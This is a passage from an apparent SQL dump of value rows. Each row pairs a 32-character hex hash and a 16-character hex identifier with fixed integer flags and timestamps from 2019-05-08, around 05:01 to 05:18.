(93271, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:01:04'),
(93272, 'e29bc5338c2eed06f962660e73cc8e74', '3de88ff4581dab27', 0, 2, 1, '2019-05-08 05:01:09'),
(93273, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:01:14'),
(93274, '6d9c61f2b94ac92272c408057e65eba0', 'd57c6a47a6711062', 0, 2, 1, '2019-05-08 05:01:15'),
(93275, 'ea78d2e75ceae8ad715190c5ef4c2390', '8e9a16956483f85e', 0, 2, 1, '2019-05-08 05:01:20'),
(93276, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:01:21'),
(93277, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:01:33'),
(93278, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:01:37'),
(93279, '17cafe26dd99b6b1d0bc683f77be34cb', '5b256f4a57545070', 0, 2, 1, '2019-05-08 05:01:41'),
(93280, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:01:46'),
(93281, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:01:48'),
(93282, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:01:49'),
(93283, '0774e2003087aeaf4d271e2ae61e2dff', '67d9c3341cc72093', 0, 2, 1, '2019-05-08 05:02:11'),
(93284, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:02:38'),
(93285, 'a9b01a4a9156f8a504e0bfad2540f810', '9ab9f70575d108ed', 0, 2, 1, '2019-05-08 05:02:44'),
(93286, '4faa0c0bd5af41740bc10b01d27bc9ac', '83c0683b7d9c2d45', 0, 2, 1, '2019-05-08 05:02:44'),
(93287, '1e16bc8ef51c505dcb59f1d2e00f958f', 'be618f277215c1f0', 0, 2, 1, '2019-05-08 05:03:01'),
(93288, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:03:07'),
(93289, '393bb9b8d5a1d1311eec66a9a73977e4', 'a639f655bef0fc87', 0, 2, 1, '2019-05-08 05:03:14'),
(93290, '50064209b4ce3a8236808fc4731e223f', '9a427fdb345399a0', 0, 2, 1, '2019-05-08 05:03:22'),
(93291, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 05:03:23'),
(93292, '13d10c7ed67c686d3fed100200a4b146', 'c1fca6d49383a74a', 0, 2, 1, '2019-05-08 05:03:24'),
(93293, 'bf506b6c921863a62b15d1652390bcf5', 'cc2105dbd92b227a', 0, 2, 1, '2019-05-08 05:03:40'),
(93294, 'de4ba009d1a8bbb6211f25504f37c1d4', '798b19a52dc93d69', 0, 2, 1, '2019-05-08 05:03:43'),
(93295, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:03:46'),
(93296, '2a496ce123ee83328275a4d3b3cfaa4d', '9bbbf0cc96b13eb1', 0, 2, 1, '2019-05-08 05:03:49'),
(93297, '727010f2cbefc5a687c85da4bad6c80b', '494698611efddd5a', 0, 2, 1, '2019-05-08 05:03:51'),
(93298, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:03:55'),
(93299, 'e9c1920174a98adf56c105734089b748', 'c4c9002176fd8f74', 0, 2, 1, '2019-05-08 05:03:58'),
(93300, '13d10c7ed67c686d3fed100200a4b146', 'c1fca6d49383a74a', 0, 2, 1, '2019-05-08 05:04:04'),
(93301, '17cafe26dd99b6b1d0bc683f77be34cb', '5b256f4a57545070', 0, 2, 1, '2019-05-08 05:04:04'),
(93302, '42a95f1ff9e8066bb4bf0c40245f7b0f', '4aba70faa7722502', 0, 2, 1, '2019-05-08 05:04:07'),
(93303, '727010f2cbefc5a687c85da4bad6c80b', '494698611efddd5a', 0, 2, 1, '2019-05-08 05:04:08'),
(93304, '06dbbdb2ce50289c1475db693df8a471', '656ee2b1a0c780d6', 0, 2, 1, '2019-05-08 05:04:17'),
(93305, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:04:22'),
(93306, '1efe088e4652a8d7fff2a5c0392af880', '7340106347808725', 0, 2, 1, '2019-05-08 05:04:25'),
(93307, '50064209b4ce3a8236808fc4731e223f', '9a427fdb345399a0', 0, 2, 1, '2019-05-08 05:04:34'),
(93308, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:04:47'),
(93309, '8511e140d3106ef5d689b8ecbe32a5a8', 'de9b8e6bc6e762ed', 0, 2, 1, '2019-05-08 05:05:05'),
(93310, '1efe088e4652a8d7fff2a5c0392af880', '7340106347808725', 0, 2, 1, '2019-05-08 05:05:05'),
(93311, '42a95f1ff9e8066bb4bf0c40245f7b0f', '4aba70faa7722502', 0, 2, 1, '2019-05-08 05:05:08'),
(93312, '1e16bc8ef51c505dcb59f1d2e00f958f', 'be618f277215c1f0', 0, 2, 1, '2019-05-08 05:05:15'),
(93313, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 05:05:22'),
(93314, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:05:29'),
(93315, '2aff1afbcefabf8d82feb8b77cfce356', '4c5bba54dd6ee09e', 0, 2, 1, '2019-05-08 05:05:34'),
(93316, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:05:36'),
(93317, '21462dc7231d55d9d048c49d43dba631', '3006d9a1b3599eb2', 0, 2, 1, '2019-05-08 05:05:44'),
(93318, '3f1a245979df1baf59ba90708ddf1c7c', '6e41251e22cbc146', 0, 2, 1, '2019-05-08 05:05:44'),
(93319, '1e16bc8ef51c505dcb59f1d2e00f958f', 'be618f277215c1f0', 0, 2, 1, '2019-05-08 05:05:48'),
(93320, '21462dc7231d55d9d048c49d43dba631', '3006d9a1b3599eb2', 0, 2, 1, '2019-05-08 05:05:53'),
(93321, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:06:04'),
(93322, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:06:06'),
(93323, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:06:10'),
(93324, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-05-08 05:06:11'),
(93325, 'e29bc5338c2eed06f962660e73cc8e74', '3de88ff4581dab27', 0, 2, 1, '2019-05-08 05:06:14'),
(93326, '9f1bdfabed50fc5cf7453c91e238bb6b', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-08 05:06:23'),
(93327, '21462dc7231d55d9d048c49d43dba631', '3006d9a1b3599eb2', 0, 2, 1, '2019-05-08 05:06:25'),
(93328, 'ebd7cc6126f72826826c06f6c80e19f9', '88b7624676a8729b', 0, 2, 1, '2019-05-08 05:06:31'),
(93329, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-08 05:06:33'),
(93330, '3f1a245979df1baf59ba90708ddf1c7c', '6e41251e22cbc146', 0, 2, 1, '2019-05-08 05:06:33'),
(93331, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:06:38'),
(93332, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:06:41'),
(93333, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-05-08 05:06:49'),
(93334, 'e2d9c04220db5424a7eac114c4aa4bef', '81aa20345d9cca6d', 0, 2, 1, '2019-05-08 05:06:53'),
(93335, '3f1a245979df1baf59ba90708ddf1c7c', '6e41251e22cbc146', 0, 2, 1, '2019-05-08 05:06:53'),
(93336, '13d10c7ed67c686d3fed100200a4b146', 'c1fca6d49383a74a', 0, 2, 1, '2019-05-08 05:06:59'),
(93337, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:07:04'),
(93338, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:07:05'),
(93339, '8c4524e7cb77bcfd024c61cc9cc13649', '7da8d3b2dc584347', 0, 2, 1, '2019-05-08 05:07:13'),
(93340, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:07:14'),
(93341, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:07:23'),
(93342, '2aff1afbcefabf8d82feb8b77cfce356', '4c5bba54dd6ee09e', 0, 2, 1, '2019-05-08 05:07:25'),
(93343, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:07:26'),
(93344, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:07:33'),
(93345, '1cd0391052952337f2d264e9dae6567a', 'dbc2d306ec305773', 0, 2, 1, '2019-05-08 05:07:53'),
(93346, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:07:53'),
(93347, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:07:59'),
(93348, '50064209b4ce3a8236808fc4731e223f', '9a427fdb345399a0', 0, 2, 1, '2019-05-08 05:08:01'),
(93349, 'ebd7cc6126f72826826c06f6c80e19f9', '88b7624676a8729b', 0, 2, 1, '2019-05-08 05:08:01'),
(93350, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:08:05'),
(93351, 'ae762be704368c54b402adf0df05e5e8', 'a4d9d8225838853d', 0, 2, 1, '2019-05-08 05:08:23'),
(93352, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:08:24'),
(93353, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 05:08:26'),
(93354, 'a63b6881a19024c2fa2bae7f50e2512c', '2034f09284a4c7ca', 0, 2, 1, '2019-05-08 05:08:28'),
(93355, '248cb001bf3c4586e7e1f2e12bc45e9a', 'b3e086714401d576', 0, 2, 1, '2019-05-08 05:08:34'),
(93356, '1efe088e4652a8d7fff2a5c0392af880', '7340106347808725', 0, 2, 1, '2019-05-08 05:08:35'),
(93357, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:08:36'),
(93358, 'df4bae8ed01d672bb251dbd210711242', '135f23c8a85974ba', 0, 2, 1, '2019-05-08 05:08:38'),
(93359, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:08:39'),
(93360, 'e29bc5338c2eed06f962660e73cc8e74', '3de88ff4581dab27', 0, 2, 1, '2019-05-08 05:08:46'),
(93361, '8969a46e91430a6256aecb1a1aa9ee65', '687e4a9b666ab8bc', 0, 2, 1, '2019-05-08 05:08:48'),
(93362, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:08:50'),
(93363, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:08:52'),
(93364, 'e7b42b10ee92bd8fc90579690422747c', 'f10990f26adcd1c5', 0, 2, 1, '2019-05-08 05:08:59'),
(93365, '3f1a245979df1baf59ba90708ddf1c7c', '6e41251e22cbc146', 0, 2, 1, '2019-05-08 05:09:04'),
(93366, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:09:10'),
(93367, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:09:13'),
(93368, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:09:14'),
(93369, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-08 05:09:23'),
(93370, '24a7d594b22ff3c41a6a2478e177ae91', '3bd48b1a40319a50', 0, 2, 1, '2019-05-08 05:09:26'),
(93371, '6d9c61f2b94ac92272c408057e65eba0', 'd57c6a47a6711062', 0, 2, 1, '2019-05-08 05:09:27'),
(93372, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:09:28'),
(93373, 'de97e50a074d1eb8ae3179299ef7f38f', 'ed66fc7b9e56126c', 0, 2, 1, '2019-05-08 05:09:29'),
(93374, 'c464ef54f88b4a78b37c6115ac1f98f3', '696f6f548674a4c1', 0, 2, 1, '2019-05-08 05:09:31'),
(93375, '45932d0b0e5d797510666f7f3e61e964', '60ed8d8f129ec3de', 0, 2, 1, '2019-05-08 05:09:32'),
(93376, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:09:36'),
(93377, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-08 05:09:45'),
(93378, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:09:51'),
(93379, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-08 05:09:59'),
(93380, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-08 05:10:05'),
(93381, '8969a46e91430a6256aecb1a1aa9ee65', '687e4a9b666ab8bc', 0, 2, 1, '2019-05-08 05:10:08'),
(93382, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:10:09'),
(93383, 'e678cdbe4c438070812302d4c497234b', '1159a417f2fa3a51', 0, 2, 1, '2019-05-08 05:10:10'),
(93384, 'e7b42b10ee92bd8fc90579690422747c', 'f10990f26adcd1c5', 0, 2, 1, '2019-05-08 05:10:12'),
(93385, '7e19719672af147a92f08fbd418907a7', '11e504ac1bc2976d', 0, 2, 1, '2019-05-08 05:10:12'),
(93386, '850d6e5488c66bff59d4e3f1933ae025', 'dd85277cbb7da2c1', 0, 2, 1, '2019-05-08 05:10:16'),
(93387, '40ab33b20223c80e5525175738953221', '7501b42c35accff7', 0, 2, 1, '2019-05-08 05:10:23'),
(93388, '7e19719672af147a92f08fbd418907a7', '11e504ac1bc2976d', 0, 2, 1, '2019-05-08 05:10:26'),
(93389, 'f61ba8391bee038de46572d6b2639b28', 'c020abbb40884763', 0, 2, 1, '2019-05-08 05:10:27'),
(93390, 'e380e2822c1bdc2133483763e014f4a7', '798d56d8d5e68e06', 0, 2, 1, '2019-05-08 05:10:33'),
(93391, 'd3f27d3fe6413237eb381b936464fa87', '63df6d17de2ba967', 0, 2, 1, '2019-05-08 05:10:33'),
(93392, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 05:10:38'),
(93393, 'de97e50a074d1eb8ae3179299ef7f38f', 'ed66fc7b9e56126c', 0, 2, 1, '2019-05-08 05:10:40'),
(93394, '17cafe26dd99b6b1d0bc683f77be34cb', '5b256f4a57545070', 0, 2, 1, '2019-05-08 05:10:44'),
(93395, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:10:46'),
(93396, '7db98bd16e105ebe37ad84888c1ee445', 'ee15d3d6defea2e0', 0, 2, 1, '2019-05-08 05:10:53'),
(93397, 'f61ba8391bee038de46572d6b2639b28', 'c020abbb40884763', 0, 2, 1, '2019-05-08 05:10:56'),
(93398, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:10:59'),
(93399, 'e29bc5338c2eed06f962660e73cc8e74', '3de88ff4581dab27', 0, 2, 1, '2019-05-08 05:11:05'),
(93400, 'e29bc5338c2eed06f962660e73cc8e74', '3de88ff4581dab27', 0, 2, 1, '2019-05-08 05:11:10'),
(93401, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-08 05:11:12'),
(93402, '7db98bd16e105ebe37ad84888c1ee445', 'ee15d3d6defea2e0', 0, 2, 1, '2019-05-08 05:11:14'),
(93403, 'e380e2822c1bdc2133483763e014f4a7', '798d56d8d5e68e06', 0, 2, 1, '2019-05-08 05:11:16'),
(93404, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 05:11:17'),
(93405, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:11:18'),
(93406, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:11:19'),
(93407, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:11:24'),
(93408, '24a7d594b22ff3c41a6a2478e177ae91', '3bd48b1a40319a50', 0, 2, 1, '2019-05-08 05:11:24'),
(93409, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:11:32'),
(93410, '7db98bd16e105ebe37ad84888c1ee445', 'ee15d3d6defea2e0', 0, 2, 1, '2019-05-08 05:11:34'),
(93411, 'f03d214ac8ef7d59eeadd6f1bec51633', '1df2ec14e12c5a30', 0, 2, 1, '2019-05-08 05:11:34'),
(93412, '6282081248234022423aaea7b5b8173f', '638f6b1ac3b915c3', 0, 2, 1, '2019-05-08 05:11:42'),
(93413, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:11:51'),
(93414, '7e19719672af147a92f08fbd418907a7', '11e504ac1bc2976d', 0, 2, 1, '2019-05-08 05:11:56'),
(93415, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:11:57'),
(93416, 'e964b977a9ee159584bef2efba8a70b0', '0b797fb53ae15810', 0, 2, 1, '2019-05-08 05:11:59'),
(93417, '0355e1836480357309b76d169214e72b', '1de090ec808c88cc', 0, 2, 1, '2019-05-08 05:12:06'),
(93418, '13d10c7ed67c686d3fed100200a4b146', 'c1fca6d49383a74a', 0, 2, 1, '2019-05-08 05:12:18'),
(93419, 'd8b97ef171bb9b8cf2179f4182f3ebb9', 'c0d620ee8725a926', 0, 2, 1, '2019-05-08 05:12:21'),
(93420, '7db98bd16e105ebe37ad84888c1ee445', 'ee15d3d6defea2e0', 0, 2, 1, '2019-05-08 05:12:22'),
(93421, 'a313e693d7d4eed891baa838e6d8db61', '2622b37d94f09b78', 0, 2, 1, '2019-05-08 05:12:38'),
(93422, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:12:42'),
(93423, '2b47e241de97970471a391e22a005296', '9f6c1e4096e1309f', 0, 2, 1, '2019-05-08 05:12:47'),
(93424, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:12:50'),
(93425, 'a313e693d7d4eed891baa838e6d8db61', '2622b37d94f09b78', 0, 2, 1, '2019-05-08 05:12:51'),
(93426, 'e4e04d55d396e92ab53c4e8b8366b96e', 'cb9fbcda504bf89a', 0, 2, 1, '2019-05-08 05:12:52'),
(93427, '2f62900e55750e9e742d7f5a300e8eea', '332723ec6654d9f5', 0, 2, 1, '2019-05-08 05:12:54'),
(93428, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:13:03'),
(93429, '50064209b4ce3a8236808fc4731e223f', '9a427fdb345399a0', 0, 2, 1, '2019-05-08 05:13:04'),
(93430, '7db98bd16e105ebe37ad84888c1ee445', 'ee15d3d6defea2e0', 0, 2, 1, '2019-05-08 05:13:04'),
(93431, '1efe088e4652a8d7fff2a5c0392af880', '7340106347808725', 0, 2, 1, '2019-05-08 05:13:06'),
(93432, 'f61ba8391bee038de46572d6b2639b28', 'c020abbb40884763', 0, 2, 1, '2019-05-08 05:13:06'),
(93433, '9ccc3bb0db3c34819a49b88cdb24de93', 'f64e91c9385d2fc5', 0, 2, 1, '2019-05-08 05:13:07'),
(93434, 'de97e50a074d1eb8ae3179299ef7f38f', 'ed66fc7b9e56126c', 0, 2, 1, '2019-05-08 05:13:12'),
(93435, '7e19719672af147a92f08fbd418907a7', '11e504ac1bc2976d', 0, 2, 1, '2019-05-08 05:13:14'),
(93436, '4faa0c0bd5af41740bc10b01d27bc9ac', '83c0683b7d9c2d45', 0, 2, 1, '2019-05-08 05:13:20'),
(93437, '2aff1afbcefabf8d82feb8b77cfce356', '4c5bba54dd6ee09e', 0, 2, 1, '2019-05-08 05:13:24'),
(93438, 'e380e2822c1bdc2133483763e014f4a7', '798d56d8d5e68e06', 0, 2, 1, '2019-05-08 05:13:25'),
(93439, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:13:27'),
(93440, 'a63b6881a19024c2fa2bae7f50e2512c', '2034f09284a4c7ca', 0, 2, 1, '2019-05-08 05:13:29'),
(93441, 'd985205233512f2c91bd909447155793', 'dcadb578720d99b9', 0, 2, 1, '2019-05-08 05:13:33'),
(93442, 'eeeb4e31eb6417f7b839dc79068bf680', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-08 05:13:34'),
(93443, 'eeeb4e31eb6417f7b839dc79068bf680', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-08 05:13:42'),
(93444, 'f29a44fb0a8c1761ca03f9ca3ed75c59', 'e793b6887430710e', 0, 2, 1, '2019-05-08 05:13:43'),
(93445, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:13:46'),
(93446, '91d3bde0108a7094c96177b2cfc496a6', '85c87c6892dfb12d', 0, 2, 1, '2019-05-08 05:13:49'),
(93447, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:13:49'),
(93448, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-08 05:13:58'),
(93449, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:14:00'),
(93450, 'c9f086bebfac10623fa2bce65b1a2fb8', '7a636002c64226bf', 0, 2, 1, '2019-05-08 05:14:01'),
(93451, 'd92dd3c4eb24fa0529ef75a7d4662b34', '6092d6c1cb041b23', 0, 2, 1, '2019-05-08 05:14:04'),
(93452, '536718ddea762c0130a6dbd14fb87d5e', '357f95c7125e091a', 0, 2, 1, '2019-05-08 05:14:06'),
(93453, 'f29a44fb0a8c1761ca03f9ca3ed75c59', 'e793b6887430710e', 0, 2, 1, '2019-05-08 05:14:19'),
(93454, 'adece9c3f48eb99d7ffa3125b5f5bf82', 'c20ddc21eab7b8b5', 0, 2, 1, '2019-05-08 05:14:27'),
(93455, '248cb001bf3c4586e7e1f2e12bc45e9a', 'b3e086714401d576', 0, 2, 1, '2019-05-08 05:14:32'),
(93456, 'e2d9c04220db5424a7eac114c4aa4bef', '81aa20345d9cca6d', 0, 2, 1, '2019-05-08 05:14:39'),
(93457, 'a9b01a4a9156f8a504e0bfad2540f810', '9ab9f70575d108ed', 0, 2, 1, '2019-05-08 05:14:42'),
(93458, '8d0a680182e8e44ac1885e7a6fde18b6', '43306683943ebaa8', 0, 2, 1, '2019-05-08 05:14:48'),
(93459, '2b47e241de97970471a391e22a005296', '9f6c1e4096e1309f', 0, 2, 1, '2019-05-08 05:14:49'),
(93460, '1cd0391052952337f2d264e9dae6567a', 'dbc2d306ec305773', 0, 2, 1, '2019-05-08 05:14:49'),
(93461, '6d9c61f2b94ac92272c408057e65eba0', 'd57c6a47a6711062', 0, 2, 1, '2019-05-08 05:14:50'),
(93462, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:14:52'),
(93463, '5837a9726a5a46d5be6f3ab6d6325181', '07ff0dd664e46fe9', 0, 2, 1, '2019-05-08 05:15:04'),
(93464, 'd92dd3c4eb24fa0529ef75a7d4662b34', '6092d6c1cb041b23', 0, 2, 1, '2019-05-08 05:15:05'),
(93465, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:15:05'),
(93466, 'c7e489301a47980c93b44596f2a2bab0', 'c12a5d4dd105ae3f', 0, 2, 1, '2019-05-08 05:15:06'),
(93467, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:15:14'),
(93468, '2b47e241de97970471a391e22a005296', '9f6c1e4096e1309f', 0, 2, 1, '2019-05-08 05:15:16'),
(93469, '42a95f1ff9e8066bb4bf0c40245f7b0f', '4aba70faa7722502', 0, 2, 1, '2019-05-08 05:15:25'),
(93470, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:15:33'),
(93471, '196e041f7e77ad039f80e166f3d38d07', 'bd882420bca652e2', 0, 2, 1, '2019-05-08 05:15:35'),
(93472, '9149fb2a490db0c3465c00c667ef6dcf', '4dca797f4c8a12c2', 0, 2, 1, '2019-05-08 05:15:42'),
(93473, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:15:44'),
(93474, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:15:49'),
(93475, '1cd0391052952337f2d264e9dae6567a', 'dbc2d306ec305773', 0, 2, 1, '2019-05-08 05:15:51'),
(93476, '9ccc3bb0db3c34819a49b88cdb24de93', 'f64e91c9385d2fc5', 0, 2, 1, '2019-05-08 05:16:02'),
(93477, '6d9c61f2b94ac92272c408057e65eba0', 'd57c6a47a6711062', 0, 2, 1, '2019-05-08 05:16:03'),
(93478, '50064209b4ce3a8236808fc4731e223f', '9a427fdb345399a0', 0, 2, 1, '2019-05-08 05:16:03'),
(93479, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:16:04'),
(93480, 'f29a44fb0a8c1761ca03f9ca3ed75c59', 'e793b6887430710e', 0, 2, 1, '2019-05-08 05:16:11'),
(93481, '17cafe26dd99b6b1d0bc683f77be34cb', '5b256f4a57545070', 0, 2, 1, '2019-05-08 05:16:13'),
(93482, '1cd0391052952337f2d264e9dae6567a', 'dbc2d306ec305773', 0, 2, 1, '2019-05-08 05:16:16'),
(93483, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-08 05:16:28'),
(93484, '0437a38ff3730a0e1fff56158838626a', 'e9f4076e834ba7fe', 0, 2, 1, '2019-05-08 05:16:28'),
(93485, '13d10c7ed67c686d3fed100200a4b146', 'c1fca6d49383a74a', 0, 2, 1, '2019-05-08 05:16:28'),
(93486, 'c358057a74397b834c4febdcb9a1801c', 'e3413f2163c4f64a', 0, 2, 1, '2019-05-08 05:16:30'),
(93487, 'b92cf93be27f800f50bf86fcdf7d9c3c', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-05-08 05:16:36'),
(93488, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:16:36'),
(93489, 'b92cf93be27f800f50bf86fcdf7d9c3c', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-05-08 05:16:50'),
(93490, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 05:16:52'),
(93491, 'b92cf93be27f800f50bf86fcdf7d9c3c', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-05-08 05:17:04'),
(93492, 'a2a3350788f220ecb99a15b4233a4759', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-08 05:17:24'),
(93493, '850d6e5488c66bff59d4e3f1933ae025', 'dd85277cbb7da2c1', 0, 2, 1, '2019-05-08 05:17:41'),
(93494, '95492574c71b54415e793cb084a37f03', '9f6c1e4096e1309f', 0, 2, 1, '2019-05-08 05:17:49'),
(93495, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-08 05:17:57'),
(93496, 'eeeb4e31eb6417f7b839dc79068bf680', '1fbc110353cdd6e5', 0, 2, 1, '2019-05-08 05:18:02'),
(93497, 'e7b42b10ee92bd8fc90579690422747c', 'f10990f26adcd1c5', 0, 2, 1, '2019-05-08 05:18:03'),
(93498, '8d0a680182e8e44ac1885e7a6fde18b6', '43306683943ebaa8', 0, 2, 1, '2019-05-08 05:18:08'),
